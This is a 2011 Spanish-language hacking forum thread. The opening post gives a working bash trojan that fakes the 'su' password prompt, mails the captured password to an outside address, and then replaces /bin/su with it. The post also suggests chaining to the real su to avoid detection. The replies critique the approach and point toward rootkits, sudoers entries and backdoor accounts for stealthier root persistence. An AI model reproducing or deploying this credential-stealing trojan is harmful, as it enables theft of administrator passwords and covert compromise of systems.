elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Troyanizando "su"
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Troyanizando "su"  (Leído 3,333 veces)
H@T


Desconectado Desconectado

Mensajes: 540



Ver Perfil WWW
Troyanizando "su"
« en: 11 Octubre 2011, 02:55 am »

Creamos un archivo su.sh y colocamos lo siguiente dentro:

Código:
#!/bin/bash
echo -n Password:
stty -echonl -echo
read VAR
echo $VAR | mail morsa@mi-dominio.com.ar
echo
echo su: Authentication failure
stty -echonl echo

Damos permisos de ejecución:

Código:
# chmod a+x su.sh

Luego podemos reemplazarlo por el verdadero su:

Código:
# whereis su
su: /bin/su /usr/share/man/man1/su.1.gz
# mv /bin/su /bin/su.orig
# mv /root/su.sh /bin/su

Luego podemos convertir el script en bash a binario como en el siguiente enlace: http://www.redes-seguridad.com.ar/2011/06/convertir-un-script-en-bash-en-un.html

También podríamos agregar al final del script la invocación del verdadero su, para que no genere ninguna duda, o moverlo nuevamente.

Opiniones, sugerencias?
En línea

H@T
http://www.redes-seguridad.com.ar
redes-seguridad.blogspot.com/
adastra
Endless Learner
Ex-Staff
*
Desconectado Desconectado

Mensajes: 885


http://thehackerway.com/


Ver Perfil WWW
Re: Troyanizando "su"
« Respuesta #1 en: 11 Octubre 2011, 11:21 am »

Vale, pero parece más un script de "cracker"/"script kiddie"...
Un hacker no "rompe" el sistema o componentes del mismo, a lo mejor modificará las llamadas del sistema y demas, pero permitirá que sigan funcionando correctamente... por ejemplo en el caso del script, solamente adquiere la contraseña, la envia a un correo determinado y posteriormente, solo enseña un mensaje de "No te puedes autenticar"... este modelo tiene varios inconvenientes.

1. Facil, muy facil de detectar por cualquier anti-rootkit en linux o incluso de forma manual, simplemente inspeccionando el sistema.
2. Ningun usuario podra utilizar el comando "su" como lo hacia habitualmente, por ende, esto despertará las sospechas de un administrador medianamente listo.
3. Si un administrador se enterá del "engaño" intentará detectar el mecanismo de acceso a la maquina e intentará bloquearlo, ademas de cambiar contraseñas y demas, lo que te dejará fuera del sistema...

Una de las principales caracteristicas de un hacker es que intentará hacer las cosas del modo más "sigiloso" posible, sin tratar de despertar sospechas, ademas de que tambien se preocupará por garantizar futuros accesos al sistema sin ser detectado...

No se... esto me suena a script kiddie...
En línea

Foxy Rider


Desconectado Desconectado

Mensajes: 2.407


Deprecated


Ver Perfil WWW
Re: Troyanizando "su"
« Respuesta #2 en: 11 Octubre 2011, 18:41 pm »

@Hat → Mirá, este método que planteás no está bueno por que depende que el comando mail esté funcionando y además es demasiado evidente ... si alguien trata de hacerse root y vé esto seguido, dalo por seguro que van a investigar el problema .. eso si no se dio cuenta mirando un su.orig cuando le daba al TAB y el autocompletado no te delató
Ir a cosas como rootkits, agregarte a sudoers o algún otro usuario que te haga de puertita a root sirve (pro y contras de por medio) ... pero para todas tenés que rootearte primero, inclusive para modificar syscalls (que, IMHO es lisa y llanamente un overkill ... es lo más al pedo que escuché)

Saludos.
« Última modificación: 11 Octubre 2011, 18:42 pm por vertex@Symphony » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
"""BUSCO EJEMPLO VB PARA ENVIAR MAILS""""
Programación Visual Basic
gera 1 6,256 Último mensaje 1 Septiembre 2005, 00:14 am
por programatrix
De donde puedo descargar utilidades: "Formas", "Estilos", "Motivos", D
Diseño Gráfico
Ad0nis 2 8,213 Último mensaje 2 Septiembre 2006, 15:48 pm
por Ad0nis
[Ayuda] modificar "start page" en "internet explorer" con "batch"
Scripting
taton 7 16,464 Último mensaje 20 Septiembre 2006, 01:45 am
por taton
Propiedad "Interprete"/"Artista"/"Autor" de una canción
Windows
Castg! 4 8,097 Último mensaje 16 Junio 2010, 07:58 am
por Roy-Mustang
Sistema>>Administracion>> ""No me aparece "Servicios""""
GNU/Linux
yoyoalee 4 8,984 Último mensaje 13 Febrero 2011, 18:34 pm
por leogtz
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines